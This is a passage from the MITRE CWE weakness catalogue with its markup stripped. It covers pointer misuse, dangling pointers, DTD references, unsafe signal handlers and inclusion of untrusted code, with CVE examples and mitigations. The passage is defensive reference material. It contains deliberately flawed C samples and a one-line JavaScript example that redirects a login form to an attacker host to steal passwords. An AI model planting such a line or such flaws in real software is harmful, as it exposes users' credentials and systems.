https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2873 - - - CVE-2010-2866 - negative value (signed) causes pointer miscalculation - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2866 - - - CVE-2010-2872 - signed values cause incorrect pointer calculation - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2872 - - - CVE-2007-5657 - values used as pointer offsets - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5657 - - - CVE-2010-2867 - a return value from a function is sign-extended if the value is signed, then used as an offset for pointer arithmetic - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2867 - - - CVE-2009-1097 - portions of a GIF image used as offsets, causing corruption of an object pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1097 - - - CVE-2008-1807 - invalid numeric field leads to a free of arbitrary memory locations, then code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1807 - - - CVE-2007-2500 - large number of elements leads to a free of an arbitrary address - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2500 - - - CVE-2008-1686 - array index issue (CWE-129) with negative offset, used to dereference a function pointer - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1686 - - - CVE-2010-2878 - "buffer seek" value - basically an offset? - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2878 - - - - - - - - - - There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains. - Many weaknesses related to pointer dereferences fall under the general term of "memory corruption" or "memory safety." As of September 2010, there is no commonly-used terminology that covers the lower-level variants. - Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples. - - - - CWE Content Team - MITRE - 2010-09-22 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The program accesses or uses a pointer that has not been initialized. - - If the pointer contains an uninitialized value, then the value might not point to a valid memory location. This could cause the program to read from or write to unexpected memory locations, leading to a denial of service. If the uninitialized pointer is used as a function call, then arbitrary functions could be invoked. If an attacker can influence the portion of uninitialized memory that is contained in the pointer, this weakness could be leveraged to execute code or perform other attacks. - Depending on memory layout, associated memory management behaviors, and program operation, the attacker might be able to influence the contents of the uninitialized pointer, thus gaining more fine-grained control of the memory location to be accessed. - - - - - - - - - - - - Confidentiality - Read Memory - If the uninitialized pointer is used in a read operation, an attacker might be able to read sensitive portions of memory. - - - Availability - DoS: Crash, Exit, or Restart - If the uninitialized pointer references a memory location that is not accessible to the program, or points to a location that is "malformed" (such as NULL) or larger than expected by a read or write operation, then a crash may occur. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - If the uninitialized pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible. - - - - - CVE-2010-0211 - chain: unchecked return value (CWE-252) leads to free of invalid, uninitialized pointer (CWE-824). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0211 - - - CVE-2009-2768 - Pointer in structure is not initialized, leading to NULL pointer dereference (CWE-476) and system crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2768 - - - CVE-2009-1721 - Free of an uninitialized pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1721 - - - CVE-2009-1415 - Improper handling of invalid signatures leads to free of invalid pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1415 - - - CVE-2009-0846 - Invalid encoding triggers free of uninitialized pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0846 - - - CVE-2009-0040 - Crafted PNG image leads to free of uninitialized pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0040 - - - CVE-2008-2934 - Crafted GIF image leads to free of uninitialized pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934 - - - CVE-2007-4682 - Access of uninitialized pointer might lead to code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4682 - - - CVE-2007-4639 - Step-based manipulation: invocation of debugging function before the primary initialization function leads to access of an uninitialized pointer and code execution. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4639 - - - CVE-2007-4000 - Unchecked return values can lead to a write to an uninitialized pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4000 - - - CVE-2007-2442 - zero-length input leads to free of uninitialized pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2442 - - - CVE-2007-1213 - Crafted font leads to uninitialized function pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1213 - - - CVE-2006-6143 - Uninitialized function pointer in freed memory is invoked - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6143 - - - CVE-2006-4175 - LDAP server mishandles malformed BER queries, leading to free of uninitialized memory - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4175 - - - CVE-2006-0054 - Firewall can crash with certain ICMP packets that trigger access of an uninitialized pointer. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0054 - - - CVE-2003-1201 - LDAP server does not initialize members of structs, which leads to free of uninitialized pointer if an LDAP request fails. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1201 - - - - - - - There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains. - Many weaknesses related to pointer dereferences fall under the general term of "memory corruption" or "memory safety." As of September 2010, there is no commonly-used terminology that covers the lower-level variants. - Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples. - - - - CWE Content Team - MITRE - 2010-09-22 - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - - - The program dereferences a pointer that contains a location for memory that was previously valid, but is no longer valid. - When a program releases memory, but it maintains a pointer to that memory, then the memory might be re-allocated at a later time. If the original pointer is accessed to read or write data, then this could cause the program to read or modify data that is in use by a different function or process. Depending on how the newly-allocated memory is used, this could lead to a denial of service, information exposure, or code execution. - - - - - - - - - - - Dangling pointer - - - - - Confidentiality - Read Memory - If the expired pointer is used in a read operation, an attacker might be able to control data read in by the application. - - - Availability - DoS: Crash, Exit, or Restart - If the expired pointer references a memory location that is not accessible to the program, or points to a location that is "malformed" (such as NULL) or larger than expected by a read or write operation, then a crash may occur. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - If the expired pointer is used in a function call, or points to unexpected data in a write operation, then code execution may be possible. - - - - - Architecture and Design - Choose a language that provides automatic memory management. - - - Implementation - When freeing pointers, be sure to set them to NULL once they are freed. However, the utilization of multiple or complex data structures may lower the usefulness of this strategy. - - - - - The following code shows a simple example of a use after free error: - - char* ptr = (char*)malloc (SIZE);if (err) {abrt = 1;free(ptr);}...if (abrt) {logError("operation aborted before commit", ptr);} - - When an error occurs, the pointer is immediately freed. However, this pointer is later incorrectly used in the logError function. - - - The following code shows a simple example of a double free error: - - char* ptr = (char*)malloc (SIZE);...if (abrt) {free(ptr);}...free(ptr); - - Double free vulnerabilities have two common (and sometimes overlapping) causes: - - - - Error conditions and other exceptional circumstances - - - Confusion over which part of the program is responsible for freeing the memory - - - - Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once. - - - - - CVE-2008-5013 - access of expired memory address leads to arbitrary code execution - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5013 - - - CVE-2010-3257 - stale pointer issue leads to denial of service and possibly other consequences - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3257 - - - CVE-2008-0062 - Chain: a message having an unknown message type may cause a reference to uninitialized memory resulting in a null pointer dereference (CWE-476) or dangling pointer (CWE-825), possibly crashing the system or causing heap corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062 - - - CVE-2007-1211 - read of value at an offset into a structure after the offset is no longer valid - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1211 - - - - There are close relationships between incorrect pointer dereferences and other weaknesses related to buffer operations. There may not be sufficient community agreement regarding these relationships. Further study is needed to determine when these relationships are chains, composites, perspective/layering, or other types of relationships. As of September 2010, most of the relationships are being captured as chains. - Many weaknesses related to pointer dereferences fall under the general term of "memory corruption" or "memory safety." As of September 2010, there is no commonly-used terminology that covers the lower-level variants. - Under-studied and probably under-reported as of September 2010. This weakness has been reported in high-visibility software, but applied vulnerability researchers have only been investigating it since approximately 2008, and there are only a few public reports. Few reports identify weaknesses at such a low level, which makes it more difficult to find and study real-world code examples. - - - - CWE Content Team - MITRE - 2010-09-22 - - - CWE Content Team - MITRE - 2011-06-27 - updated Demonstrative_Examples, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Alternate_Terms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Observed_Examples - - - - - The program releases a resource that is still intended to be used by the program itself or another actor. - - This weakness focuses on errors in which the program should not release a resource, but performs the release anyway. This is different than a weakness in which the program releases a resource at the appropriate time, but it maintains a reference to the resource, which it later accesses. For this weakness, the resource should still be valid upon the subsequent access. - When a program releases a resource that is still being used, it is possible that operations will still be taken on this resource, which may have been repurposed in the meantime, leading to issues similar to CWE-825. Consequences may include denial of service, information exposure, or code execution. - - - - - - - - Confidentiality - Read Application Data - Read Memory - If the released resource is subsequently reused or reallocated, then a read operation on the original resource might access sensitive data that is associated with a different user or entity. - - - Availability - DoS: Crash, Exit, or Restart - When the resource is released, the software might modify some of its structure, or close associated channels (such as a file descriptor). When the software later accesses the resource as if it is valid, the resource might not be in an expected state, leading to resultant errors that may lead to a crash. - - - Integrity - Confidentiality - Availability - Execute Unauthorized Code or Commands - Modify Application Data - Modify Memory - When the resource is released, the software might modify some of its structure. This might affect program logic in the sections of code that still assume the resource is active. If the released resource is related to memory and is used in a function call, or points to unexpected data in a write operation, then code execution may be possible upon subsequent accesses. - - - - - CVE-2009-3547 - chain: race condition might allow resource to be released before operating on it, leading to NULL dereference - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3547 - - - - Under-studied and under-reported as of September 2010. This weakness has been reported in high-visibility software, although the focus has been primarily on memory allocation and de-allocation. There are very few examples of this weakness that are not directly related to memory management, although such weaknesses are likely to occur in real-world software for other types of resources. - - - - CWE Content Team - MITRE - 2010-09-22 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - - - The software does not restrict a reference to a Document Type Definition (DTD) to the intended control sphere. This might allow attackers to reference arbitrary DTDs, possibly causing the software to expose files, consume excessive system resources, or execute arbitrary http requests on behalf of the attacker. - - As DTDs are processed, they might try to read or include files on the machine performing the parsing. If an attacker is able to control the DTD, then the attacker might be able to specify sensitive resources or requests or provide malicious content. - For example, the SOAP specification prohibits SOAP messages from containing DTDs. - - - - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Read Files or Directories - If the attacker is able to include a crafted DTD and a default entity resolver is enabled, the attacker may be able to access arbitrary files on the system. - - - Availability - DoS: Resource Consumption (CPU) - DoS: Resource Consumption (Memory) - The DTD may cause the parser to consume excessive CPU cycles or memory using techniques such as nested or recursive entity references (CWE-776). - - - Integrity - Confidentiality - Availability - Access Control - Execute Unauthorized Code or Commands - Gain Privileges or Assume Identity - The DTD may include arbitrary HTTP requests that the server may execute. This could lead to other attacks leveraging the server's trust relationship with other entities. - - - - - CVE-2010-2076 - Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2076 - - - - - - - - CWE Content Team - MITRE - 2010-10-25 - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2013-02-21 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Relationships - - - - - The software defines a signal handler that contains code sequences that are not asynchronous-safe, i.e., the functionality is not reentrant, or it can be interrupted. - - This can lead to an unexpected system state with a variety of potential consequences depending on context, including denial of service and code execution. - Signal handlers are typically intended to interrupt normal functionality of a program, or even other signals, in order to notify the process of an event. When a signal handler uses global or static variables, or invokes functions that ultimately depend on such state or its associated metadata, then it could corrupt system state that is being used by normal functionality. This could subject the program to race conditions or other weaknesses that allow an attacker to cause the program state to be corrupted. While denial of service is frequently the consequence, in some cases this weakness could be leveraged for code execution. - There are several different scenarios that introduce this issue: - - - Invocation of non-reentrant functions from within the handler. One example is malloc(), which modifies internal global variables as it manages memory. Very few functions are actually reentrant. - Code sequences (not necessarily function calls) contain non-atomic use of global variables, or associated metadata or structures, that can be accessed by other functionality of the program, including other signal handlers. Frequently, the same function is registered to handle multiple signals. - The signal handler function is intended to run at most one time, but instead it can be invoked multiple times. This could happen by repeated delivery of the same signal, or by delivery of different signals that have the same handler function (CWE-831). - - - Note that in some environments or contexts, it might be possible for the signal handler to be interrupted itself. - If both a signal handler and the normal behavior of the software have to operate on the same set of state variables, and a signal is received in the middle of the normal execution's modifications of those variables, the variables may be in an incorrect or corrupt state during signal handler execution, and possibly still incorrect or corrupt upon return. - - - - - - - Integrity - Confidentiality - Availability - DoS: Crash, Exit, or Restart - Execute Unauthorized Code or Commands - The most common consequence will be a corruption of the state of the software, possibly leading to a crash or exit. However, if the signal handler is operating on state variables for security relevant libraries or protection mechanisms, the consequences can be far more severe, including protection mechanism bypass, privilege escalation, or information exposure. - - - - - Implementation - Architecture and Design - - Eliminate the usage of non-reentrant functionality inside of signal handlers. This includes replacing all non-reentrant library calls with reentrant calls. - Note: This will not always be possible and may require large portions of the software to be rewritten or even redesigned. Sometimes reentrant-safe library alternatives will not be available. Sometimes non-reentrant interaction between the state of the system and the signal handler will be required by design. - - High - - - Implementation - Where non-reentrant functionality must be leveraged within a signal handler, be sure to block or mask signals appropriately. This includes blocking other signals within the signal handler itself that may also leverage the functionality. It also includes blocking all signals reliant upon the functionality when it is being accessed or modified by the normal behaviors of the software. - - - - - This code registers the same signal handler function with two different signals (CWE-831). If those signals are sent to the process, the handler creates a log message (specified in the first argument to the program) and exits. - - char *logMessage; - void handler (int sigNum) { - syslog(LOG_NOTICE, "%s\n", logMessage);free(logMessage); - /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ - - sleep(10);exit(0); - } - int main (int argc, char* argv[]) { - logMessage = strdup(argv[1]); - /* Register signal handlers. */ - - signal(SIGHUP, handler);signal(SIGTERM, handler); - /* artificially increase the size of the timing window to make demonstration of this weakness easier. */ - - sleep(10); - } - - The handler function uses global state (globalVar and logMessage), and it can be called by both the SIGHUP and SIGTERM signals. An attack scenario might follow these lines: - - - - The program begins execution, initializes logMessage, and registers the signal handlers for SIGHUP and SIGTERM. - - - The program begins its "normal" functionality, which is simplified as sleep(), but could be any functionality that consumes some time. - - - The attacker sends SIGHUP, which invokes handler (call this "SIGHUP-handler"). - - - SIGHUP-handler begins to execute, calling syslog(). - - - syslog() calls malloc(), which is non-reentrant. malloc() begins to modify metadata to manage the heap. - - - The attacker then sends SIGTERM. - - - SIGHUP-handler is interrupted, but syslog's malloc call is still executing and has not finished modifying its metadata. - - - The SIGTERM handler is invoked. - - - SIGTERM-handler records the log message using syslog(), then frees the logMessage variable. - - - - At this point, the state of the heap is uncertain, because malloc is still modifying the metadata for the heap; the metadata might be in an inconsistent state. The SIGTERM-handler call to free() is assuming that the metadata is inconsistent, possibly causing it to write data to the wrong location while managing the heap. The result is memory corruption, which could lead to a crash or even code execution, depending on the circumstances under which the code is running. - Note that this is an adaptation of a classic example as originally presented by Michal Zalewski [REF-360]; the original example was shown to be exploitable for code execution. - Also note that the strdup(argv[1]) call contains a potential buffer over-read (CWE-126) if the program is called without any arguments, because argc would be 0, and argv[1] would point outside the bounds of the array. - - - The following code registers a signal handler with multiple signals in order to log when a specific event occurs and to free associated memory before exiting. - - #include <signal.h>#include <syslog.h>#include <string.h>#include <stdlib.h> - void *global1, *global2;char *what;void sh (int dummy) { - syslog(LOG_NOTICE,"%s\n",what);free(global2);free(global1); - /* Sleep statements added to expand timing window for race condition */ - - sleep(10);exit(0); - } - int main (int argc,char* argv[]) { - what=argv[1];global1=strdup(argv[2]);global2=malloc(340);signal(SIGHUP,sh);signal(SIGTERM,sh); - /* Sleep statements added to expand timing window for race condition */ - - sleep(10);exit(0); - } - - However, the following sequence of events may result in a double-free (CWE-415): - - - - a SIGHUP is delivered to the process - - - sh() is invoked to process the SIGHUP - - - This first invocation of sh() reaches the point where global1 is freed - - - At this point, a SIGTERM is sent to the process - - - the second invocation of sh() might do another free of global1 - - - this results in a double-free (CWE-415) - - - - This is just one possible exploitation of the above code. As another example, the syslog call may use malloc calls which are not async-signal safe. This could cause corruption of the heap management structures. For more details, consult the example within "Delivering Signals for Fun and Profit" [REF-360]. - - - - - CVE-2008-4109 - Signal handler uses functions that ultimately call the unsafe syslog/malloc/s*printf, leading to denial of service via multiple login attempts - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4109 - - - CVE-2006-5051 - Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051 - - - CVE-2001-1349 - unsafe calls to library functions from signal handler - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349 - - - CVE-2004-0794 - SIGURG can be used to remotely interrupt signal handler; other variants exist. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0794 - - - CVE-2004-2259 - SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259 - - - CVE-2002-1563 - SIGCHLD not blocked in a daemon loop while counter is modified, causing counter to get out of sync. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1563 - - - - - SIG31-C - Do not access or modify shared objects in signal handlers - - - - - - - - - CWE Content Team - MITRE - 2010-11-08 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2014-06-23 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2017-11-08 - updated Observed_Examples - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software imports, requires, or includes executable functionality (such as a library) from a source that is outside of the intended control sphere. - - When including third-party functionality, such as a web widget, library, or other source of functionality, the software must effectively trust that functionality. Without sufficient protection mechanisms, the functionality could be malicious in nature (either by coming from an untrusted source, being spoofed, or being modified in transit from a trusted source). The functionality might also contain its own weaknesses, or grant access to additional functionality and state information that should be kept private to the base system, such as system state information, sensitive application data, or the DOM of a web application. - This might lead to many different consequences depending on the included functionality, but some examples include injection of malware, information exposure by granting excessive privileges or permissions to the untrusted functionality, DOM-based XSS vulnerabilities, stealing user's cookies, or open redirect to malware (CWE-601). - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Confidentiality - Integrity - Availability - Execute Unauthorized Code or Commands - An attacker could insert malicious functionality into the program by causing the program to download code that the attacker has placed into the untrusted control sphere, such as a malicious web site. - - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies - - - - - SOAR Partial - - - Dynamic Analysis with Manual Results Interpretation - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Forced Path Execution - Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious - - - - - SOAR Partial - - - Manual Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Manual Source Code Review (not inspections) - - - Cost effective for partial coverage: - - - Focused Manual Spotcheck - Focused manual analysis of source - - - - - High - - - Automated Static Analysis - Source Code - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Source code Weakness Analyzer - Context-configured Source Code Weakness Analyzer - - - - - SOAR Partial - - - Architecture or Design Review - - According to SOAR, the following detection techniques may be useful: - - Highly cost effective: - - - Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) - Formal Methods / Correct-By-Construction - - - Cost effective for partial coverage: - - - Attack Modeling - - - - - High - - - - - Architecture and Design - Libraries or Frameworks - Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. - - - Architecture and Design - Enforcement by Conversion - - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-45] provide this capability. - - - - Architecture and Design - For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. - - - Architecture and Design - Operation - Sandbox or Jail - - Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. - OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. - This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. - Be careful to avoid CWE-243 and other weaknesses related to jails. - - Limited - The effectiveness of this mitigation depends on the prevention capabilities of the specific sandbox or jail being used and might only help to reduce the scope of an attack, such as restricting the attacker to certain system calls or limiting the portion of the file system that can be accessed. - - - Architecture and Design - Operation - Environment Hardening - Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - High - - - Architecture and Design - Operation - Attack Surface Reduction - - Store library, include, and utility files outside of the web document root, if possible. Otherwise, store them in a separate directory and use the web server's access control capabilities to prevent attackers from directly requesting them. One common practice is to define a fixed constant in each calling program, then check for the existence of the constant in the library/include file; if the constant does not exist, then the file was directly requested, and it can exit immediately. - This significantly reduces the chance of an attacker being able to bypass any protection mechanisms that are in the base program but not in the include files. It will also reduce the attack surface. - - - - Architecture and Design - Implementation - Attack Surface Reduction - - Understand all the potential areas where untrusted inputs can enter your software: parameters or arguments, cookies, anything read from the network, environment variables, reverse DNS lookups, query results, request headers, URL components, e-mail, files, filenames, databases, and any external systems that provide data to the application. Remember that such inputs may be obtained indirectly through API calls. - Many file inclusion problems occur because the programmer assumed that certain inputs could not be modified, especially for cookies and URL components. - - - - Operation - Firewall - Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. - Moderate - An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. - - - - - This login webpage includes a weather widget from an external website: - - <div class="header"> Welcome!<div id="loginBox">Please Login:<form id ="loginForm" name="loginForm" action="login.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><input type="submit" value="Login" /></form></div><div id="WeatherWidget"><script type="text/javascript" src="externalDomain.example.com/weatherwidget.js"></script></div></div> - - This webpage is now only as secure as the external domain it is including functionality from. If an attacker compromised the external domain and could add malicious scripts to the weatherwidget.js file, the attacker would have complete control, as seen in any XSS weakness (CWE-79). - For example, user login information could easily be stolen with a single line added to weatherwidget.js: - - - - ...Weather widget code.... - document.getElementById('loginForm').action = "ATTACK.example.com/stealPassword.php"; - - This line of javascript changes the login form's original action target from the original website to an attack site. As a result, if a user attempts to login their username and password will be sent directly to the attack site. - - - - - CVE-2010-2076 - Product does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2076 - - - CVE-2004-0285 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0285 - - - CVE-2004-0030 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0030 - - - CVE-2004-0068 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0068 - - - CVE-2005-2157 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2157 - - - CVE-2005-2162 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2162 - - - CVE-2005-2198 - Modification of assumed-immutable configuration variable in include file allows file inclusion via direct request. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2198 - - - CVE-2004-0128 - Modification of assumed-immutable variable in configuration script leads to file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0128 - - - CVE-2005-1864 - PHP file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1864 - - - CVE-2005-1869 - PHP file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1869 - - - CVE-2005-1870 - PHP file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1870 - - - CVE-2005-2154 - PHP local file inclusion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2154 - - - CVE-2002-1704 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1704 - - - CVE-2002-1707 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1707 - - - CVE-2005-1964 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1964 - - - CVE-2005-1681 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1681 - - - CVE-2005-2086 - PHP remote file include. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2086 - - - CVE-2004-0127 - Directory traversal vulnerability in PHP include statement. - 